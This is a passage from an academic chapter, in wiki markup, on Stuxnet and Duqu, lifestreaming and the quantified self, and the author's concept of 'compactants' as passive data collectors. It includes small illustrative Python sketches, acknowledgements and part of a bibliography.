1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so to learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one with purposes linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions that deceive the human and non-human actors making up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time streams’ platforms such as Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter’s text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his personal data systematically. As he explains, he started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions: who owns and can access these personal archives, for instance, and how does seeing one’s life rendered as data change the way one lives it? The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry common in smartphones, to log GPS location, direction and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users who are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
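&lt;br /&gt;
To make this concrete, the JSON serialisation of the standard (ActivityStreamsWG, 2011) encodes such an activity roughly as in the following Python sketch; the serialisation follows the spec’s actor/verb/object/target vocabulary, but the names and URL here are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import json &lt;br /&gt;
from datetime import datetime, timezone &lt;br /&gt;
 &lt;br /&gt;
# A minimal activity in the spirit of JSON Activity Streams 1.0: &lt;br /&gt;
# an actor performs a verb on an object, optionally towards a target. &lt;br /&gt;
activity = { &lt;br /&gt;
    'published': datetime.now(timezone.utc).isoformat(), &lt;br /&gt;
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'}, &lt;br /&gt;
    'verb': 'post', &lt;br /&gt;
    'object': {'objectType': 'photo', 'url': 'http://example.org/photos/1'}, &lt;br /&gt;
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday Album'}, &lt;br /&gt;
} &lt;br /&gt;
 &lt;br /&gt;
# Serialised like this, the event can be transmitted and later &lt;br /&gt;
# aggregated, searched and processed by any consumer of the stream. &lt;br /&gt;
print(json.dumps(activity, indent=2)) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;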
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualised, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organisation (such as Facebook), the key is to pattern-match and compare details of the data, for example against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
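&lt;br /&gt;
As a toy illustration of this pattern-matching move, the sketch below compares a personal time series against its own norm; the step counts are invented, and real systems would obviously use richer models and reference populations: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import statistics &lt;br /&gt;
 &lt;br /&gt;
# Hypothetical daily step counts drawn from a life-streaming device. &lt;br /&gt;
steps = [8200, 7900, 8400, 8100, 12000, 7800, 3100, 8300] &lt;br /&gt;
 &lt;br /&gt;
# The personal 'norm': the mean and spread of the historical series. &lt;br /&gt;
norm = statistics.mean(steps) &lt;br /&gt;
spread = statistics.stdev(steps) &lt;br /&gt;
 &lt;br /&gt;
# Express each day as a deviation from that norm, the basic move behind &lt;br /&gt;
# most self-quantifying charts, alerts and comparisons against a group. &lt;br /&gt;
for day, value in enumerate(steps, start=1): &lt;br /&gt;
    z = (value - norm) / spread &lt;br /&gt;
    print(f'day {day}: {value:6d} steps, {z:+.2f} standard deviations') &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;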
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also in terms of offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives through a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions: how are we to detect, let alone consent to, such monitoring, and who is accountable for the data it gathers? Yet users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality – under the surface, relatively benign and silent – yet aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined, also neatly expresses the sense of what web bugs and related technologies are. Compactants are useful, too, in relation to the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data often generated, the computational processing and aggregation are often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
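&lt;br /&gt;
This dichotomous structure can be caricatured in a few lines of Python; the sketch is purely illustrative of the collect/report split described above, not of any actual web bug or virus: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
from dataclasses import dataclass, field &lt;br /&gt;
 &lt;br /&gt;
@dataclass &lt;br /&gt;
class Compactant: &lt;br /&gt;
    # Passive mode: silently hoard whatever behavioural signals pass by. &lt;br /&gt;
    signals: list = field(default_factory=list) &lt;br /&gt;
 &lt;br /&gt;
    def observe(self, signal): &lt;br /&gt;
        self.signals.append(signal) &lt;br /&gt;
 &lt;br /&gt;
    # Aggressive mode: 'call home', handing the hoard to a remote &lt;br /&gt;
    # aggregator (the 'cloud') for processing and visualisation. &lt;br /&gt;
    def call_home(self): &lt;br /&gt;
        payload, self.signals = list(self.signals), [] &lt;br /&gt;
        return payload &lt;br /&gt;
 &lt;br /&gt;
bug = Compactant() &lt;br /&gt;
for event in ['page view', 'mouse move', 'status update']: &lt;br /&gt;
    bug.observe(event) &lt;br /&gt;
print(bug.call_home())   # ['page view', 'mouse move', 'status update'] &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;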
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, of time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
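&lt;br /&gt;
In the crudest terms, such a future state can literally be computed as an object from the stored past. The following sketch is only a caricature of this temporal embedding; the series and the linear extrapolation are invented for illustration and bear no relation to real forecasting models: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import statistics &lt;br /&gt;
 &lt;br /&gt;
# The past as stored data: a time-series structured stream (a list). &lt;br /&gt;
past = [2.1, 2.3, 2.2, 2.6, 2.8, 2.7, 3.0] &lt;br /&gt;
 &lt;br /&gt;
def project(series, steps): &lt;br /&gt;
    # The future as a code-object: a naive projection that carries &lt;br /&gt;
    # the mean first difference of the series forward. &lt;br /&gt;
    diffs = [b - a for a, b in zip(series, series[1:])] &lt;br /&gt;
    trend = statistics.mean(diffs) &lt;br /&gt;
    return [series[-1] + trend * (i + 1) for i in range(steps)] &lt;br /&gt;
 &lt;br /&gt;
# Re-run as new data arrive at the head of the stream, the projection &lt;br /&gt;
# is updated in real time, like a model of a future state. &lt;br /&gt;
print(project(past, 3)) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;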
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy and, whilst drawing on a wide range of scholarly work from the sciences, social sciences, and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
